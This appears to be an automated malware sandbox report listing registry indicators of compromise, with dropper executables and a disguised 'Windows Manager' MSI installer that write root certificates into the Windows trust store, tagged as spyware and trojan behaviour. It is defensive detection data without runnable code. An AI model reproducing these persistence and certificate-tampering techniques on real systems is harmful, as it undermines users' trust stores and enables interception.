Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 405a0e5fb0afd701	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\Total = "122"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000aaf76285c8641c44a89794754f06354f00000000020000000000106600000001000020000000c9809297f4fffdafc482d442ea445a307ca52b5dd3b5215005d8caaa3337f292000000000e8000000002000020000000607108b09d49c7d54f430a5b3ad6fdd4d3c1cf37273c710bd2035f02f5a496899000000058c233ec42f78cdb6a141eafab44fee69ab0330dd007938bd8e5873149e635fd7a283056d34caba25fa814b1c8f7b731f59215d12f8304cbd4559f5224b296e74dd3a13e252b84ab28c67194baf298c81109a5f24373ab2805cb8e84765a493842aac201bb026cbb44ee3ec5e53c0bc14de1c3ec6be3686fe5bc6e7c9f74e1f754656e1d23e825cc6cbce8c99a655ce1400000007941844b7bac8a26f3f5a15b8a4f1f8a91ccf5056a20462f9fbb5c87bea2126bf22b50455086e9935c63451976f2c732ea9db330f7b7bf102ba2d843c019a59e	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\Total\ = "9"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DOMStorage\bestanimegame.com\Total = "1404"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE

Modifies data under HKEY_USERS 64 IoCs

Processes:

LzmwAqmV.exemsiexec.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	LzmwAqmV.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E	msiexec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time"	LzmwAqmV.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\26	msiexec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	LzmwAqmV.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time"	LzmwAqmV.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	LzmwAqmV.exe

Modifies registry class 24 IoCs

Processes:

msiexec.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\DeploymentFlags = "3"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Language = "1033"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductIcon = "C:\\Windows\\Installer\\{C845414C-903C-4218-9DE7-132AB97FDF62}\\logo.exe"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\InstanceType = "0"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\DiskPrompt = "[1]"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26\MainFeature	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\ProductName = "Windows Manager"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "6BBF4B2F4524B25478C17BFBEE2559F7"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Assignment = "1"	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\PackageName = "Windows Manager - Postback Y.msi"	msiexec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Clients = 3a0000000000	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AdvertiseFlags = "388"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\AuthorizedLUAApp = "0"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\5785CBDF4ABB5AD409841A692AF14EA9\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\AW Manager\\Windows Manager 1.0.0\\install\\97FDF62\\"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\SourceList\Media\1 = ";"	msiexec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\Version = "16777216"	msiexec.exe

Modifies system certificate store 2 TTPs 16 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

installer.exeSun1917b8fb5f09db8.exeSun19de8ff4b6aefeb8.exe2.exeSun19262b9e49ad.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Sun1917b8fb5f09db8.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	Sun1917b8fb5f09db8.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	Sun19de8ff4b6aefeb8.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	installer.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	installer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	2.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	Sun19262b9e49ad.exe
